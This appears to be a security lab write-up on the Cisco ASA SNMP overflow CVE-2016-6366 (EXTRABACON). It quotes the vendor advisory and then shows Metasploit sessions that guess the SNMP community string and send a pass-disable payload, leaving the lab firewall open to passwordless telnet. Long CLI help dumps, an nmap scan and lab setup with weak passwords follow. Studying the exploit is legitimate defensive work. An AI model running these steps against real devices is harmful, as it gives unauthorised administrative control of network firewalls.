Vuln - Cisco - CVE-2016-6366

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp says

A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.

The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP (versions 1, 2c, and 3) when enabled on a virtual or physical Cisco ASA device. An attacker could exploit this vulnerability by sending crafted SNMP packets to an SNMP-enabled interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.

Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.

Cisco has released software updates that address this vulnerability. Mitigations are listed in the Workarounds section of this advisory.

Exploit Cisco CVE-2016-6366

https://github.com/RiskSense-Ops/CVE-2016-6366/

msf auxiliary(snmp_login) > set PASSWORD publicPASSWORD => publicmsf auxiliary(snmp_login) > set RHOSTS 192.168.206.114RHOSTS => 192.168.206.114msf auxiliary(snmp_login) > run[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

msf auxiliary(cisco_asa_extrabacon) > show optionsModule options (auxiliary/admin/cisco/cisco_asa_extrabacon):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   COMMUNITY  public           yes       SNMP Community String   MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)   RETRIES    1                yes       SNMP Retries   RHOST      192.168.206.114  yes       The target address   RPORT      161              yes       The target port   TIMEOUT    1                yes       SNMP Timeoutmsf auxiliary(cisco_asa_extrabacon) > run[*] Building pass-disable payload for version 9.2(1)...[*] Sending SNMP payload...[+] Clean return detected![!] Don't forget to run pass-enable after logging in![*] Auxiliary module execution completed

Please telnet the target host with no password.

$ telnet 192.168.206.114

---

Unprivileged Mode

ciscoasa> ?  clear       Reset functions  enable      Turn on privileged commands  exit        Exit from the EXEC  help        Interactive help for commands  login       Log in as a particular user  logout      Exit from the EXEC  no          Negate a command or set its defaults  ping        Send echo messages  quit        Exit from the EXEC  show        Show running system information  traceroute  Trace route to destination

Version

ciscoasa> show version Cisco Adaptive Security Appliance Software Version 9.2(1) Device Manager Version 7.2(1)Compiled on Thu 24-Apr-14 12:14 PDT by buildersSystem image file is "boot:/asa921-smp-k8.bin"Config file at boot was "startup-config"ciscoasa up 2 hours 25 minsHardware:   ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,Internal ATA Compact Flash, 256MBSlot 1: ATA Compact Flash, 8192MBBIOS Flash Firmware Hub @ 0x1, 0KB 0: Ext: Management0/0       : address is 000c.29a9.88d6, irq 10 1: Ext: GigabitEthernet0/0  : address is 000c.29a9.88e0, irq 5 2: Ext: GigabitEthernet0/1  : address is 000c.29a9.88ea, irq 9 3: Ext: GigabitEthernet0/2  : address is 000c.29a9.88f4, irq 10ASAv Platform License State: Unlicensed*Install -587174176 vCPU ASAv platform license for full functionality.The Running Activation Key is not valid, using default settings:Licensed features for this platform:Virtual CPUs                      : 0              perpetualMaximum Physical Interfaces       : 10             perpetualMaximum VLANs                     : 50             perpetualInside Hosts                      : Unlimited      perpetualFailover                          : Active/Standby perpetualEncryption-DES                    : Enabled        perpetualEncryption-3DES-AES               : Enabled        perpetualSecurity Contexts                 : 0              perpetualGTP/GPRS                          : Disabled       perpetualAnyConnect Premium Peers          : 2              perpetualAnyConnect Essentials             : Disabled       perpetualOther VPN Peers                   : 250            perpetualTotal VPN Peers                   : 250            perpetualShared License                    : Disabled       perpetualAnyConnect for Mobile             : Disabled       perpetualAnyConnect for Cisco VPN Phone    : Disabled       perpetualAdvanced Endpoint Assessment      : Disabled       perpetualUC Phone Proxy Sessions           : 2              perpetualTotal UC Proxy Sessions           : 2              perpetualBotnet Traffic Filter             : Enabled        perpetualIntercompany Media Engine         : Disabled       perpetualCluster                           : Disabled       perpetualThis platform has an ASAv VPN Premium license.Serial Number: 9ATJDXTHK3BRunning Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 Image type          : ReleaseKey version         : AConfiguration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016

Privileged Mode

ciscoasa> help enable USAGE:    enable [<priv_level>]DESCRIPTION:enable      Turn on privileged commands

ciscoasa> enable ?  <0-15>  Enter optional privilege level (0-15)  <cr>

ciscoasa> enablePassword: ciscoasa# configure terminalciscoasa(config)# ?  aaa                           Enable, disable, or view user authentication,                                authorization and accounting  aaa-server                    Configure a AAA server group or a AAA server  access-group                  Bind an access-list to an interface to filter                                traffic  access-list                   Configure an access control element  arp                           Change or view ARP table, set ARP timeout                                value, view statistics  as-path                       BGP autonomous system path filter  asdm                          Configure Device Manager  asp                           Configure ASP parameters  auth-prompt                   Customize authentication challenge, reject or                                acceptance prompt  auto-update                   Configure Auto Update  banner                        Configure login/session banners  bgp-community                 format for BGP community  boot                          Set system boot parameters  ca                            Certification authority  call-home                     Smart Call-Home Configuration  checkheaps                    Configure checkheap verification intervals  class-map                     Configure MPF Class Map  clear                         Clear  client-update                 Configure and change client update parameters  clock                         Configure time-of-day clock  cluster                       Cluster configuration  command-alias                 Create command alias  community-list                Add a community list entry  compression                   Configure global Compression parameters  configure                     Configure using various methods  console                       Serial console functions  coredump                      Configure Coredump options  crashinfo                     Enable/Disable writing crashinfo to flash  crypto                        Configure IPSec, ISAKMP, Certification                                authority, key  ctl-file                      Configure a ctl-file instance  ctl-provider                  Configure a CTL Provider instance  cts                           Cisco Trusted Security commands  ddns                          Configure dynamic DNS update method  dhcp-client                   Configure parameters for DHCP client operation  dhcpd                         Configure DHCP Server  dhcprelay                     Configure DHCP Relay Agent  dns                           Add DNS functionality to an interface  dns-group                     Set the global DNS server group  dns-guard                     Enforce one DNS response per query  domain-name                   Change domain name  dynamic-access-policy-record  Dynamic Access Policy configuration commands  dynamic-filter                Configure Dynamic Filter  dynamic-map                   Configure crypto dynamic map  enable                        Configure password for the enable command  end                           Exit from configure mode  established                   Allow inbound connections based on established                                connections  event                         Configure event manager  exit                          Exit from config mode  failover                      Enable/disable failover feature  filter                        Enable or disable URL, FTP, HTTPS, Java, and                                ActiveX filtering  fips                          FIPS 140-2 compliance information  firewall                      Switch to router/transparent mode  fixup                         Add or delete inspection services  flow-export                   Configure flow information export through                                NetFlow  fragment                      Configure the IP fragment database  ftp                           Set FTP mode  ftp-map                       Configure advanced options for FTP inspection  group-delimiter               The delimiter for tunnel-group lookup.  group-policy                  Configure or remove a group policy  gtp-map                       Configure advanced options for GTP inspection  h225-map                      Configure advanced options for H225 inspection  help                          Interactive help for commands  hostname                      Change host name of the system  hpm                           Configure TopN host statistics collection  http                          Configure http server and https related                                commands  http-map                      This command has been deprecated.  icmp                          Configure access rules for ICMP traffic  imap4s                        Configure the imap4s service  interface                     Select an interface to configure  ip                            Configure IP address pools  ip                            Configure IP addresses, address pools, IDS, etc  ipsec                         Configure transform-set, IPSec SA lifetime and                                PMTU Aging reset timer  ipv6                          Configure IPv6 address pools  ipv6                          Global IPv6 configuration commands  ipv6-vpn-addr-assign          Global settings for VPN IP address assignment                                policy  isakmp                        Configure ISAKMP options  jumbo-frame                   Configure jumbo-frame support  key                           Create various configuration keys  l2tp                          Configure Global L2TP Parameters  ldap                          Configure LDAP Mapping  logging                       Configure logging levels, recipients and other                                options  logout                        Logoff from config mode  mac-address                   MAC address options  mac-list                      Create a mac-list to filter based on MAC                                address  management-access             Configure management access interface  map                           Configure crypto map  media-termination             Configure a media-termination instance  mgcp-map                      Configure advanced options for MGCP inspection  migrate                       Migrate IKEv1 configuration to IKEv2/SSL  monitor-interface             Enable or disable failover monitoring on a                                specific interface  mount                         Configure a system mount  mroute                        Configure static multicast routes  mtu                           Specify MTU(Maximum Transmission Unit) for an                                interface  multicast-routing             Enable IP multicast  name                          Associate a name with an IP address  names                         Enable/Disable IP address to name mapping  nat                           Associate a network with a pool of global IP                                addresses  no                            Negate a command or set its defaults  ntp                           Configure NTP  nve                           Configure an Network Virtulization Endpoint                                (NVE)  object                        Configure an object  object-group                  Create an object group for use in                                'access-list', etc  object-group-search           Enables object group search algorithm  pager                         Control page length for pagination  passwd                        Change Telnet console access password  password                      Configure password encryption  password-policy               Configure password policy options  phone-proxy                   Configure a Phone proxy instance  pim                           Configure Protocol Independent Multicast  policy-list                   Define IP Policy list  policy-map                    Configure MPF Parameter Map  pop3s                         Configure the pop3s service  prefix-list                   Build a prefix list  priority-queue                Enter sub-command mode to set priority-queue                                attributes  privilege                     Configure privilege levels for commands  prompt                        Configure session prompt display  quit                          Exit from config mode  quota                         Configure quotas  regex                         Define a regular expression  remote-access                 Configure SNMP trap threshold for VPN                                remote-access sessions  route                         Configure a static route for an interface  route-map                     Create route-map or enter route-map                                configuration mode  router                        Enable a routing process  same-security-traffic         Enable same security level interfaces to                                communicate  scansafe                      Scansafe configuration  service                       Configure system services  service-interface             service-interface for dynamic interface types  service-policy                Configure MPF service policy  setup                         Pre-configure the system  sla                           IP Service Level Agreement  smtp-server                   Configure default SMTP server address to be                                used for Email  smtps                         Configure the smtps service  snmp                          Configure the SNMP options  snmp-map                      Configure an snmp-map, to control the operation                                of the SNMP inspection  snmp-server                   Modify SNMP engine parameters  ssh                           Configure SSH options  ssl                           Configure SSL options  sunrpc-server                 Create SUNRPC services table  sysopt                        Set system functional options  tcp-map                       Configure advanced options for TCP inspection  telnet                        Add telnet access to system console or set idle                                timeout  terminal                      Set terminal line parameters  tftp-server                   Configure default TFTP server address and                                directory  threat-detection              Show threat detection information  time-range                    Define time range entries  timeout                       Configure maximum idle times  tls-proxy                     Configure a TLS proxy instance or the maximum                                sessions  track                         Object tracking configuration commands  tunnel-group                  Create and manage the database of connection                                specific records for IPSec connections  tunnel-group-map              Specify policy by which the tunnel-group name                                is derived from the content of a certificate.  uc-ime                        Configure a Cisco Intercompany Media Engine                                (UC-IME) instance  url-block                     Enable URL pending block buffer and long URL                                support  url-cache                     Enable/Disable URL caching  url-server                    Configure a URL filtering server  user-identity                 Configure user-identity firewall  username                      Configure user authentication local database  virtual                       Configure address for authentication virtual                                servers  vnmc                          Configure VNMC params  vpdn                          Configure VPDN feature  vpn                           Configure VPN parameters.  vpn-addr-assign               Global settings for VPN IP address assignment                                policy  vpn-sessiondb                 Configure the VPN Session Manager  vpnsetup                      Configure VPN Setup Commands  vxlan                         Configure VXLAN system parameters  wccp                          Web-Cache Coordination Protocol Commands  webvpn                        Configure the WebVPN service  xlate                         Configure an xlate option  zonelabs-integrity            ZoneLabs integrity Firewall Server                                Configuration

Cisco Terminal

ciscoasa> enable Password: ciscoasa# configure ?     terminal  Configure using terminal/console ciscoasa# configure terminal ciscoasa(config)# 

Cisco Interfaces

ciscoasa(config)# interface ?configure mode commands/options:  GigabitEthernet  GigabitEthernet IEEE 802.3z  Management       Management interface  Redundant        Redundant Interface  TVI              Tenant Virtual Interface  vni              VNI Interface  <cr>

ciscoasa(config)# interface GigabitEthernet ?configure mode commands/options:  <0-0>  GigabitEthernet interface number

ciscoasa(config)# interface GigabitEthernet 0?configure mode commands/options:  /  

ciscoasa(config)# interface GigabitEthernet 0/?configure mode commands/options:  <0-2>  GigabitEthernet interface number

ciscoasa(config)# interface GigabitEthernet 0/0

Cisco Interfaces Config - set a ip address

ciscoasa(config-if)# ? Interface configuration commands:  authentication   authentication subcommands  ddns             Configure dynamic DNS  default          Set a command to its defaults  delay            Specify interface throughput delay  description      Interface specific description  dhcp             Configure parameters for DHCP client  dhcprelay        Configure DHCP Relay Agent  duplex           Configure duplex operation  exit             Exit from interface configuration mode  flowcontrol      Configure flowcontrol operation  hello-interval   Configures EIGRP-IPv4 hello interval  help             Interactive help for interface subcommands  hold-time        Configures EIGRP-IPv4 hold time  igmp             IGMP interface commands  ip               Configure the ip address  ipv6             IPv6 interface subcommands  mac-address      Assign MAC address to interface  management-only  Dedicate an interface to management. Block thru traffic  mfib             Interface Specific MFIB Control  multicast        Configure multicast routing  nameif           Assign name to interface  no               Negate a command or set its defaults  ospf             OSPF interface commands  pim              PIM interface commands  pppoe            Configure parameters for PPPoE client  rip              Router Information Protocol  security-level   Specify the security level of this interface after this                   keyword, Eg: 0, 100 etc. The relative security level between                   two interfaces determines the way the Adaptive Security                   Algorithm is applied. A lower security_level interface is                   outside relative to a higher level interface and equivalent                   interfaces are outside to each other  shutdown         Shutdown the selected interface  speed            Configure speed operation  split-horizon    Configures EIGRP-IPv4 split-horizon  summary-address  Configures EIGRP-IPv4 summary-address

ciscoasa(config-if)# ip address ?interface mode commands/options:  Hostname or A.B.C.D  Firewall's network interface address  dhcp                 Keyword to use DHCP to poll for information. Enables the                       DHCP client feature on the specified interface  pppoe                Keyword to use PPPoE to poll for information. Enables                       the PPPoE client feature on the specified interfaceciscoasa(config)#  ip address 192.168.206.114 255.255.255.0ciscoasa(config-if)# no shutdownciscoasa(config-if)# exitciscoasa(config)# exit

ciscoasa# ping 192.168.206.1Type escape sequence to abort.Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:!!!!!Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms

Enable snmp

ciscoasa# configure terminalciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public

Enable ssh

ciscoasa# configure terminal ciscoasa(config)# username admin password passwordciscoasa(config)# aaa authentication ssh console LOCALciscoasa(config)# passwd passwordciscoasa(config)# crypto key generate rsa ?            configure mode commands/options:  general-keys  Generate a general purpose RSA key pair for signing and                encryption  label         Provide a label  modulus       Provide number of modulus bits on the command line  noconfirm     Specify this keyword to suppress all interactive prompting.  usage-keys    Generate seperate RSA key pairs for signing and encryption  <cr>ciscoasa(config)# crypto key generate rsa modulus ?configure mode commands/options:  1024  1024 bits  2048  2048 bits  4096  4096 bits  512   512 bits  768   768 bitsciscoasa(config)#  ssh 192.168.206.1 255.255.255.0 inside ciscoasa(config)#  ssh 192.168.206.137 255.255.255.0 inside ciscoasa(config)#  ssh version 2

Enable Telnet

ciscoasa# configure terminal ciscoasa(config)# aaa authentication telnet console LOCALciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside 

Nmap scan

sec@gpg:~$ nmap -v -n -Pn -sV --open 192.168.206.114Starting Nmap 6.40 ( http://nmap.org ) at 2016-09-26 04:01 CDTNSE: Loaded 23 scripts for scanning.Initiating Connect Scan at 04:01Scanning 192.168.206.114 [1000 ports]Discovered open port 23/tcp on 192.168.206.114Discovered open port 22/tcp on 192.168.206.114Completed Connect Scan at 04:01, 4.83s elapsed (1000 total ports)Initiating Service scan at 04:01Scanning 2 services on 192.168.206.114Completed Service scan at 04:01, 0.00s elapsed (2 services on 1 host)NSE: Script scanning 192.168.206.114.Nmap scan report for 192.168.206.114Host is up (0.00040s latency).Not shown: 998 filtered portsPORT   STATE SERVICE VERSION22/tcp open  ssh     Cisco SSH 1.25 (protocol 2.0)23/tcp open  telnet  Cisco ASA 5505 firewall telnetdService Info: OS: IOS; Device: firewall; CPE: cpe:/o:cisco:iosRead data files from: /usr/bin/../share/nmapService detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds

References

https://github.com/RiskSense-Ops/CVE-2016-6366/
http://paper.seebug.org/31/
http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/118075-configure-asa-00.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp